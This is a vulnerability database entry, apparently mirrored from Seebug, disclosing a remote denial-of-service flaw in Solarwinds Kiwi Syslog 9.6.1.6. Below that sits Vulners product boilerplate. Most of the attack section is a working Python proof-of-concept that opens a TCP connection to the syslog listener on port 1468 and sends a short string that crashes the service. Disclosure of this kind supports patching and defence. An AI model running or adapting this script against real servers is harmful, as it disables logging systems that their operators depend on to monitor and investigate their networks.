Lucene search
K

Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service

🗓️ 03 Aug 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

A remote Denial of Service exists in Solarwinds Kiwi Syslog 9.6.1.6 due to a Type Mismatch error in the TCP listener. The syslog TCP listener is disabled by default

Code

                                                #!/usr/bin/python
import socket
 
host    = "10.0.0.56"
port    = 1468
 
buffer  = "crash please?"
 
try:
        print "[*] Connecting to %s:%d" % (host, port)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
 
        print "[*] Sending buffer... (%d bytes)" % len(buffer)
        s.send(buffer)
        s.close()
 
        print "[*] Done."
except:
        print "[-] Error connecting"
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation